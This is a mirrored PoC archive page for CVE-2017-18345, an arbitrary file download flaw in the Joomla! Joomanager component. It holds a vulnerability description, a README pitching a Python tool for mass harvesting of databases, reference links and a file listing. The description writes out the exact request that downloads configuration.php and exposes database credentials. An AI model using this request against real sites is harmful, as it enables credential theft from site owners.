Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-18345 PoC — Joomla! Joomanager组件安全漏洞

Source
https://github.com/Luth1er/CVE-2017-18345-COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD
Associated Vulnerability
Title:Joomla! Joomanager组件安全漏洞 (CVE-2017-18345)
Description:Joomla!是美国Open Source Matters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。Joomanager是使用在其中的一个网站广告模块。 Joomla! Joomanager组件2.0.0及之前版本中存在安全漏洞。攻击者可通过发送index.php?option=com_joomanager&controller=details&task=download&path=configuration.php请求利用该漏洞泄露数据库的凭证。
Description
The Joomanager component through 2.0.0 for Joomla! has an Arbitrary File Download issue, resulting in exposing the Credentials of the DataBase.
Readme
[![Version](https://img.shields.io/badge/Joomla-com_joomanager_2.0-magenta.svg?maxAge=259200)]()
[![Engine](https://img.shields.io/badge/CVE-2017_18345-yellow.svg)]()
[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Version-Python2.7-green.svg)]()


# COM_JOOMANAGER 2.0 -ARBITRARY FILE DOWNLOAD

![alt tag](https://imgur.com/ZzJTlA8.jpg)

Collecting databases in mass with plugin : COM_JOOMANAGER, From CMS: Joomla, Project developed in python 2.x, more information, access the youtube video.

*CVE:* `2017-18345`         *Risk*: `Security Risk High`

*0day.Today-ID:* `29950`         *ExploitDB-id:* `44252`

*0day db-id:* `16348`     *CXSecurity-id:* `WLB-2018030054`

**CVSS v3.0 Severity and Metrics:**
*Base Score:* `9.8 CRITICAL`

- https://vel.joomla.org/vel-blog/2020-joomanager-2-0-0-other
- https://www.cvedetails.com/cve/CVE-2017-18345/
- https://nvd.nist.gov/vuln/detail/CVE-2017-18345
- https://twitter.com/cvenew/status/1033829060588302337
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18345
- https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-18345.html
- https://launchpad.net/bugs/cve/CVE-2017-18345
- https://security-tracker.debian.org/tracker/CVE-2017-18345
- https://www.cvedetails.com/cve/CVE-2017-18345/
- https://vuldb.com/?id.123260
- https://infosec.cert-pa.it/cve-2017-18345.html
- https://0day.today/exploit/29950
- https://www.exploit-db.com/exploits/44252
- https://cxsecurity.com/issue/WLB-2018030054
- https://www.exploitalert.com/view-details.html?id=29114
- https://www.phpsecure.info/go/162082.html
- https://hackertor.com/2017/08/31/joomla-component-joomanager-2-0-0-arbitrary-file-download/
- https://buzzreddit.com/post/82glkb
- https://www.exploit-database.net/?id=96963
- http://reader.centrodouniverso.com.br/archives/544371



![alt tag](http://imgur.com/HfQFiSy.jpg)
![alt tag](http://imgur.com/qLfUelc.jpg)
![alt tag](http://imgur.com/GUlGz6e.jpg)

**DEPENDENCES**
- `BeautifulSoup`
- `Threading`
- `urlparse`
- `urllib2`
- `argparse`
- `requests`
File Snapshot

 [4.0K]  /data/pocs/bc4916148cbf783d263fb94508f0a9113e74ef71
├── [1.4K]  COM_JOOMANAGER_TARGETS.txt
├── [ 11K]  CVE-2017-18345-com_joomanager.py
├── [ 34K]  LICENSE
└── [2.0K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.